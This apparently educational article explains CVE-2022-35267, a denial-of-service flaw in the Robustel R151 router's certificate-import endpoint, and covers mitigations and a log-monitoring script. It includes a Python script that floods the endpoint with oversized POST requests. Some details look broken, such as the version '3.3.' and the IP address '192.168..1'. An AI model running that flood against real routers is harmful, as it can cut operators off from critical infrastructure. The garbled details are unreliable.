CVE-2022-35267 - Denial of Service in Robustel R151 Web Server (`/action/import_https_cert_file/`) — Vulnerability Explained
One of the silent yet devastating attacks on network devices comes from what is known as Denial of Service (DoS) vulnerabilities. In this article, we take a deep dive into CVE-2022-35267, a vulnerability that affects the Robustel R151 router versions 3.1.16 and 3.3.. This vulnerability can allow an attacker to render a device unusable—potentially cutting off critical infrastructure—using nothing but network requests and a quirk in the web server’s hash processing.
What is the Robustel R151?
The Robustel R151 is a widely used industrial cellular router, often deployed for remote monitoring, industrial automation, and IoT applications. It features a built-in web server for administration, where users can import and manage certificates among many other things.
Where does the issue lie?
The problem sits in a web server endpoint: /action/import_https_cert_file/. If you send requests to this API in a specific way, the router's web server can get stuck, causing a halt, soft reboot, or just endless sluggishness.
Vulnerability Details
Vulnerability Name: CVE-2022-35267
Product: Robustel R151
Firmware Versions Affected: 3.1.16 and 3.3.
Component: web_server hashFirst function, /action/import_https_cert_file/ endpoint
Type: Denial of Service (DoS)
How Does It Work?
The web server expects a properly formed request to /action/import_https_cert_file/ for importing HTTPS cert files. However, thanks to insufficient bounds checking or error handling inside a low-level function (likely named hashFirst), an attacker can send a deliberately malformed or oversized payload.
Repeated, carefully crafted requests can exhaust system resources or trigger a code path that locks up the service—leading either to a crash, a soft reboot, or outright denial of access to the management interface.
Attack Scenario
Who could be affected?
Any organization using a vulnerable Robustel R151 router accessible from a network segment controlled by an attacker.
What’s the risk?
An attacker can cut off network operators from managing or monitoring their device. In environments where these routers are the only connection to remote assets, this could lead to serious consequences.
Exploit Example
Here’s a simplified Python script that demonstrates how the vulnerability might be triggered. This is for educational purposes only; always have written permission before testing a system.
```python
import requests

target = "http://192.168..1"  # Change to your test device's IP
url = target + "/action/import_https_cert_file/"

# Craft a malicious POST request, e.g., oversize the payload
malicious_payload = {
    "cert_file": "A" * 10000  # Intentionally large, may trigger the bug
}

try:
    for i in range(100):  # Send a burst of malicious requests
        response = requests.post(url, data=malicious_payload, timeout=2)
        print(f"Attempt {i+1}: HTTP {response.status_code}")
except Exception as e:
    print("Error:", e)
```
*Note:* The real attack may use slightly different parameters or headers, but the principle is the same: exhaust the router by abusing the vulnerable endpoint.
CVE Entry:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35267
NVD Details:
https://nvd.nist.gov/vuln/detail/CVE-2022-35267
Related Robustel Advisory:
*(Not always available; for official info, check Robustel's Security Advisories page)*
- Check the firmware version of your R151. If you see 3.1.16 or 3.3., you are likely at risk.
- Look for unexplained device lockups or reboots, especially after unknown POST requests to the affected endpoint.
Upgrade Firmware:
Robustel has issued newer firmware updates. Download the latest version from their site or your distributor.
Monitor Logs:
Watch for repeated failed POSTs to /action/import_https_cert_file/ in your device’s logs.
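One way to automate the log check above, as an added example that is not part of the original article and not Robustel code. The Common Log Format layout, the `find_bursts` name, the threshold and window values, and the sample lines are all assumptions; adapt the regex to whatever your device or an upstream proxy actually logs.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

ENDPOINT = "/action/import_https_cert_file/"

# Assumption: Common Log Format lines, e.g. from a proxy in front of the router.
LINE_RE = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}|-) \S+'
)

def find_bursts(lines, threshold=5, window=timedelta(seconds=10)):
    """Map each source to its peak number of POSTs to ENDPOINT inside one
    window, for sources reaching `threshold`. Requests with no logged status
    ("-") count too, because a hung web server may never answer.
    Lines are expected in chronological order."""
    recent = defaultdict(deque)   # source -> timestamps still inside the window
    peaks = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Drop any query string and tolerate a missing trailing slash.
        path = m["path"].split("?", 1)[0].rstrip("/") + "/"
        if path != ENDPOINT:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["src"]]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            peaks[m["src"]] = max(peaks.get(m["src"], 0), len(q))
    return peaks

# Constructed sample log, not captured from a real device.
SAMPLE = (
    ['10.0.0.5 - - [25/Oct/2022:17:14:00 +0000] '
     '"POST /action/import_https_cert_file/ HTTP/1.1" 200 31']
    + [f'10.0.0.66 - - [25/Oct/2022:17:15:{s:02d} +0000] '
       f'"POST {ENDPOINT} HTTP/1.1" - -' for s in range(8)]
    + ['10.0.0.5 - - [25/Oct/2022:17:20:00 +0000] "GET /index.html HTTP/1.1" 200 512']
)

if __name__ == "__main__":
    for src, count in find_bursts(SAMPLE).items():
        print(f"ALERT {src}: {count} POSTs to {ENDPOINT} within 10 s")
```

A single certificate import by an administrator stays below the threshold; only a source that hits the endpoint repeatedly inside the window is reported.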
Conclusion
CVE-2022-35267 is a textbook example of how a small flaw in parsing web requests can lead to major headaches for industrial network operators. Patch your devices and never expose unnecessary services to untrusted networks. Remember, even industrial routers are just small servers—they can be brought down by the simplest requests if misconfigured.
*Stay secure. Keep an eye on firmware updates, and always review accessible endpoints on your network devices!*
Disclaimer:
This article is for educational purposes. Do not exploit vulnerabilities on systems you do not own or have explicit permission to test.
Timeline
Published on: 10/25/2022 17:15:00 UTC
Last modified on: 03/01/2023 01:52:00 UTC